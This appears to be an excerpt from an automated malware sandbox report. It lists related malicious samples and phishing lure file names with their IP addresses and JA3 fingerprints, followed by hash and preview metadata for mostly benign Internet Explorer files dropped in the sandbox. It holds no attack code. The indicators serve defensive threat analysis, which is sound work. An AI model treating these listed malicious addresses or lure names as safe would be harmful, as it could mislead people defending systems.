	SecuriteInfo.com.BScope.TrojanPSW.Racealer.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.BScope.TrojanPSW.Racealer.exe	Get hash	malicious	Browse	52.37.89.225
	SecuriteInfo.com.BehavesLike.Win32.Packed.bt.exe	Get hash	malicious	Browse	52.37.89.225
FASTLYUS	SCAN_PO210205.exe.exe	Get hash	malicious	Browse	185.199.111.153
	Farie PO.doc	Get hash	malicious	Browse	151.101.13.188
	acr1.dll	Get hash	malicious	Browse	151.101.1.44
	TRIGANOcr.dll	Get hash	malicious	Browse	151.101.1.44
	ct.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Trojan.PackedNET.535.22246.exe	Get hash	malicious	Browse	151.101.0.133
	dmHeTAQKjt.exe	Get hash	malicious	Browse	151.101.0.133
	v1K1JNtCgt.exe	Get hash	malicious	Browse	185.199.108.153
	Cerere de pret NUM003112 09-02-2021.doc	Get hash	malicious	Browse	151.101.13.188
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	151.101.1.44
	BullGuard.dll	Get hash	malicious	Browse	151.101.1.44
	Jidert.dll	Get hash	malicious	Browse	151.101.1.44
	Vu2QRHVR8C.dll	Get hash	malicious	Browse	151.101.1.44
	header[1].jpg.dll	Get hash	malicious	Browse	151.101.1.44
	header.dll	Get hash	malicious	Browse	151.101.1.44
	SimpleAudio.dll	Get hash	malicious	Browse	151.101.1.44
	cSPuZxa7I4.dll	Get hash	malicious	Browse	151.101.1.44
	Phish.htm	Get hash	malicious	Browse	151.101.1.195
	ace80239facd926583cb2f9ceb84bb9c.exe	Get hash	malicious	Browse	151.101.0.133
	82e6033fb85f4abe59e16cb29c9faca2.exe	Get hash	malicious	Browse	151.101.0.133
CLOUDFLARENETUS	ABN RM753.docx	Get hash	malicious	Browse	104.21.14.177
	DHL Parcel Details.xlsx	Get hash	malicious	Browse	172.67.194.16
	ABN RM753.docx	Get hash	malicious	Browse	104.21.14.177
	TELEGRAPHIC TRANSFER.xlsx	Get hash	malicious	Browse	104.22.1.232
	ATT200192.exe	Get hash	malicious	Browse	162.159.130.233
	Btlldqti.exe	Get hash	malicious	Browse	162.159.130.233
	Tuesday, February 9th, 2021 8%3A1%3A54 a.m., _20210209080154.8E45EAA12FF8DC21@sophiajoyas.cl_.html	Get hash	malicious	Browse	104.16.18.94
	MicrosoftEdgeSetup.exe	Get hash	malicious	Browse	1.3.139.71
	SecuriteInfo.com.Exploit.Siggen3.7850.19332.xls	Get hash	malicious	Browse	172.67.8.238
	Claim-738868413-02092021.xls	Get hash	malicious	Browse	172.67.133.211
	SecuriteInfo.com.Exploit.Siggen3.7850.19332.xls	Get hash	malicious	Browse	172.67.8.238
	Claim-738868413-02092021.xls	Get hash	malicious	Browse	104.21.5.204
	Scan-PI497110_pdf.gz.exe	Get hash	malicious	Browse	23.227.38.74
	Debtor_Statement.xlsx	Get hash	malicious	Browse	104.22.1.232
	Shipping-Documents,PDF.exe	Get hash	malicious	Browse	172.67.188.154
	SWIFT-MT103.exe	Get hash	malicious	Browse	172.67.188.154
	CT-0000337_PROTECH DEL PEREU SAC.exe	Get hash	malicious	Browse	172.67.188.154
	acr1.dll	Get hash	malicious	Browse	104.20.184.68
	TRIGANOcr.dll	Get hash	malicious	Browse	104.20.184.68
	Claim-9696823-02092021.xls	Get hash	malicious	Browse	172.67.133.211

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	Tuesday, February 9th, 2021 8%3A1%3A54 a.m., _20210209080154.8E45EAA12FF8DC21@sophiajoyas.cl_.html	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	acr1.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	TRIGANOcr.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	ct.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	February Payroll.xls.htm	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	SecuriteInfo.com.Trojan.PackedNET.535.22246.exe	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	Tuesday, February 9th, 2021 83422 a.m., 20210209083422.7B8380338EC1D61B@sophiajoyas.cl.html	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	255423.jhertlein.255423.htm	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	BullGuard.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	P012108.htm	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	Jidert.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	Zoom Invita______tion 2021020104882460.html	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	Friday_ February 5th_ 2021 64427 a.m._ 20210205064427.64791275BD060468@juidine.com.html	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	Vu2QRHVR8C.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	Jackson Collins@278180-3963.htm	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	header[1].jpg.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	header.dll	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	Remittance58404.htm	Get hash	malicious	Browse	104.20.185.68 151.101.1.44
	93762900.htm	Get hash	malicious	Browse	104.20.185.68 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Reputation:	high, very likely benign file
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2994
Entropy (8bit):	4.9318500984758815
Encrypted:	false
SSDEEP:	48:LK0K0K0K0p0p40p0I0I0IdP0SP0SP0SP0SPaK0SPaKpl0SPaKpl0SPaKpl0SPaKb:2fffII4IFFFdPfPfPfPfPaKfPaKplfP5
MD5:	239C136FE9F89D9906FEB006029BCB0A
SHA1:	74AD6688BAA9F9B1970154575F2715C4913A68D3
SHA-256:	A1E1146ED0F00A5FB53E4E3CEE86EE3372E213DAC7A57EB1E64EED51E75E413B
SHA-512:	E6DBFCC79DC2AFB023051F4DBAD9165C6C9274463B3441649792E0BDB3A424628715C71325911845977D58A18944775E48C29E485EB48B7004D9857E8832D116
Malicious:	false
Reputation:	low
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="1516958688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1516958688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1516958688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1516958688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1517158688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1517158688" htime="30867322" /><item name="mntest" value="mntest" ltime="1519198688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1517158688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1521598688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1521598688" htime="30867322" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1521598688" htime="30867322" /><item name="mntest" value="mntest" ltime="1521718688" htime="30867322"

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9561B4B9-6B6D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	66792
Entropy (8bit):	2.0884766627456495
Encrypted:	false
SSDEEP:	384:rIJr6UHbHdH5HsHbHEHJHSHAH3HZuH4KftqHSGHwdHrL:Qut3dL
MD5:	DC92D740708B49493AFF34D72EE3945A
SHA1:	FD18FF4852AAC9E8435DB873CFCF690C3809B598
SHA-256:	2CC691B5DB2CC11B36ACC6D44B5BCED72DDCBA073C203AF7A6127B614266B0DE
SHA-512:	1E594D8B81FE2FE6A392EAA5EF537C221176430B40C7A265A9A83CD3D34EDF45B40B5669BFC8D446E5B24735986CB2322FF9EA3925F7834EB203732FC6852230
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	195430
Entropy (8bit):	3.5818477291386617
Encrypted:	false
SSDEEP:	3072:L3Z/2BfcYmu5kLTzGt5Z/2Bfc/mu5kLTzGt8:iov
MD5:	5868D37E03CFCA7E397D0D2131CFB655
SHA1:	A61CC463F0870DCA9F7EF9F3E297FE0F11CB8202
SHA-256:	4B4B73F4391C38DF2C5424B08E06280EC5F79FB11B450407B5E636A6AFA50F13
SHA-512:	F77179B51E1BA63B96EDB7BD8BECAFCDC47FC83D9187AD24B7A362079571772EC81490BA4BD5F7AD23C814029B767B83039443657CA9E5D5E3C89D7484E7A98C
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A4019755-6B6D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27400
Entropy (8bit):	1.8459010198616825
Encrypted:	false
SSDEEP:	96:r/uZRrQS6kBSxFjF2EkWzMaYCEhYxEhsCA:r/uZRrQS6kkxFjF2EkWzMaYCwYxwsCA
MD5:	0B2A2DF2E49454B078172459C3E85848
SHA1:	F93951D5B6E543691FB72A0453CB3F1B461E7941
SHA-256:	B895D08C65CF0ECB8EDBCB20081AA97C5027E3B429DF800674E8A69668080645
SHA-512:	FA871C7628BB2C395DDEEE8C2D2AE29EACF0F9E0C4A2BA5F68E37411EA103B1C1698A20CBE78B961640BFEAA323371D2188918552B880F11DD3CA96362A89BBE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BA083ADC-6B6D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	modified
Size (bytes):	19032
Entropy (8bit):	1.5913696142442852
Encrypted:	false
SSDEEP:	48:IwvGcprCGwpa5G4pQ1GrapbSbrGQpBaGHHpccsTGUpQdhGcpm:rlZqQb6lBSbFjh2ck6dg
MD5:	F14FC28E6828643B7A92F3A67D5E2548
SHA1:	90D1EAFAFD23CC3A7DE863A83325B6ED7BF6436A
SHA-256:	FEC0CAE796436ED2338E0E86BD61BDFA08968F776BC80492BF63CEC7985DE0A6
SHA-512:	D672A1074BD1C2ED808EA8BF543B0F9C627B5FF73AC6987C92EB92E1C81E54A7E5D3373D376DA474B809757D65C289EC5F498040C82DD5AC1FBF6B9843382741
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.075898445633359
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEq1zR1mnWimI002EtM3MHdNMNxOEq1zKumnWimI00OYGVbkEtMb:2d6NxO3z7mSZHKd6NxO3zdmSZ7YLb
MD5:	7FDCA3A9B491C2942C4D69915DF3FE28
SHA1:	0BA54F9D6B4FD7995CE9073F2263124DB8036D86
SHA-256:	FDC51F9113EED8C63608B56CA219FAEF96F3140F316D390E16040EA95F3DE090
SHA-512:	6DB2DE28D928D597C17633D08887B44B82B41E2D54862BEDB87A27B8F7B61BD596B2C27310D917B1418CEFBF015CC4BD32018AAA353B53F9FB056CEA43D898FD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.111199737646001
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kB7zI7mnWimI002EtM3MHdNMNxe2kB7zI7mnWimI00OYGkak6EtMb:2d6NxrAzsmSZHKd6NxrAzsmSZ7Yza7b
MD5:	D1DF01B2AC27FB5990C8D8F4F2AFB00E
SHA1:	AB0036D280353795E08E20FAF7CCB6B11C25E0FD
SHA-256:	07AB7C5B7A3062D05E0A10F67A42F96AF72FD7B72B247A31210199430F4F9FAA
SHA-512:	30FBD75992F08ADBDF2DBA891428C1D0390AD6C84BCE1406EA88963EF2B25AE29DBECE902DBF45FDC665FBAD4F9F11EC40F86B443C0215B0A094E6D8ED5EB511
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6b9f88ad,0x01d6ff7a</date><accdate>0x6b9f88ad,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6b9f88ad,0x01d6ff7a</date><accdate>0x6b9f88ad,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.103295488826997
Encrypted:	false
SSDEEP:	12:TMHdNMNxvL5uzKumnWimI002EtM3MHdNMNxvL5uzKumnWimI00OYGmZEtMb:2d6NxvozdmSZHKd6NxvozdmSZ7Yjb
MD5:	A4F3734C49E1422D1AD1D74E9D29D6A5
SHA1:	63E274CF7DE0E6A2098002269BA67BD273B16139
SHA-256:	927A90EE78530ED3E0E29187C2777DEB8E8954C44CC45CDF145AA9DACE74BF50
SHA-512:	D866849E70B67DC4ECD528A898A59A4B74D6A48FD13E358ACB77A7B6D06F38ECDDBA5C281417D5AC570856D16988A2445787E54CD445F33C20D616B8B80FE4FC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.077798665112223
Encrypted:	false
SSDEEP:	12:TMHdNMNxi5XnWimI002EtM3MHdNMNxi5XnWimI00OYGd5EtMb:2d6NxqXSZHKd6NxqXSZ7YEjb
MD5:	B8F001CBE0B176A7AAECEFD0564A9A6B
SHA1:	7EF7C8A3B31AD7EA8739C2779A22CCBDADED3A43
SHA-256:	F12ADF35DCA40DAEC20544D2BD61EF87158F6D0D904509FBDC044E7372473E02
SHA-512:	D445076B7CFA275DF2D3FDD1F4A382117AD046D04209D7DC7DBABCEC3EC84E4BD97F41080056F64A8E1FAE2A6579160650DA6FA331CDE6D4364339D2CC9F8418
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.11656010923755
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGw5uzKumnWimI002EtM3MHdNMNxhGw5uzKumnWimI00OYG8K075EtMb:2d6NxQ1zdmSZHKd6NxQ1zdmSZ7YrKajb
MD5:	C83832141CD35D87828F06C31BFB2A75
SHA1:	6A6BBC37A6559999434CAAA3AED18A6B02A64978
SHA-256:	D0DF8E4410CEF86142724C79A2D5E955D7CB7BE6F6245AA85B22AA92C8C761E9
SHA-512:	BD48E3E90B6B1894BD3BEEE6A91E2A6CE6BEEBA9F7ED19C4EDB634839609D67632EF3F9A503076DDD81888FB517F56BC9DE4251D8C9F969E395DEAE509F46E71
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.063908012770798
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nq1zR1mnWimI002EtM3MHdNMNx0nq1zR1mnWimI00OYGxEtMb:2d6Nx0qz7mSZHKd6Nx0qz7mSZ7Ygb
MD5:	E17ECB74D405F334112635F17E011C8F
SHA1:	890EFF49DD71C94A911DC4D84A83139DA872732A
SHA-256:	DE4C0DD53888737C2BA64AA8BF3B191199A497D0365770DFCEF556C561E91B0B
SHA-512:	DF6A3DE128D691085076D2610B2462F6CA815BC56EF1ED9591E7D5D59A9C8BAD3922F181FF249BA82BA1B837997A585D1406F3EBBEB42191F059075E0FB837C2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.1143284396152575
Encrypted:	false
SSDEEP:	12:TMHdNMNxx7aidnWimI002EtM3MHdNMNxx7aR1mnWimI00OYG6Kq5EtMb:2d6NxFaidSZHKd6NxFa7mSZ7Yhb
MD5:	06E2041C9927E0D2720E0B4EFD5FF3BD
SHA1:	AAD0CD5269AE9731AA78E06EE2D9042FA50326E0
SHA-256:	3F3DBDD94B2CEEB5E9DB36936D280E596B6D8A0E92EBF20F6C484189E824549D
SHA-512:	4CAB4BC74013ACC02EFD6F284A2F948887D0198B58EF2E40146014FDEBEB92EE37E13B41374B9636CE0B6430FCE95A25A29FAD98BFF8E187CE909A02B0C7085A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6ba44d60,0x01d6ff7a</date><accdate>0x6ba44d60,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6ba44d60,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.074272363668935
Encrypted:	false
SSDEEP:	12:TMHdNMNxc5XnWimI002EtM3MHdNMNxc5XnWimI00OYGVEtMb:2d6NxMXSZHKd6NxMXSZ7Ykb
MD5:	AFA9B39FCF2B41C7589DA1FA9FC1B7E0
SHA1:	DB74637B5CF9D3E9DA984A247EF93639E5E60293
SHA-256:	0490A2867434787656F7E4EA0EB9C93B55AAAFB2E954F22AB6526B3F8E26E04B
SHA-512:	A98C8C58F57530742EA7EEA18E44AF5D8F54D843730790D4396E7D18ED091A55BC0E3E021673EE76ED6A033EB1DE63CB368F75226ACEA77DB5EF948273E79F9F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.0634321728463405
Encrypted:	false
SSDEEP:	12:TMHdNMNxfn5XnWimI002EtM3MHdNMNxfn5XnWimI00OYGe5EtMb:2d6NxxXSZHKd6NxxXSZ7YLjb
MD5:	0F12E016550A554C90F79E9386CECC90
SHA1:	5A22B7FCB4D1C1156AD93A6FAA99DA78352B16FA
SHA-256:	3FA845A0CD7031BC037A7911EDABCCD28F8D63E3C6E98884341D2C7459F6465D
SHA-512:	F3C277855F69742EE756CC0B23EEC8A0312BB5F493ACF066F83BF0C37CEAA3EE40CEE2679321021B49B5FB84A0289268D4097DC9934E5F48F4064CD34F5894CE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.036435383616078
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGAr:u6tWu/6symC+PTCq5TcBUX4bOr
MD5:	0486F8DDD9FA081F5E60461DFB32BECC
SHA1:	F70571B3FF89358DCA01DD22701C5B78A343B606
SHA-256:	F32552558C853FD964059380936D1DB67B7220F9DFD8C52B3B9145E8968FA460
SHA-512:	711F59654D8ECFA931D1A703A5A8ADBB129DD1FE35D9D59EF062A33888104B06C9E4E6FD2EB284DBB7877D30138837DB28B091BFD8A2A0067D68F9BA346A09D7
Malicious:	false
Preview:	E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... ...........q.#`....q.#`....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	downloaded
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
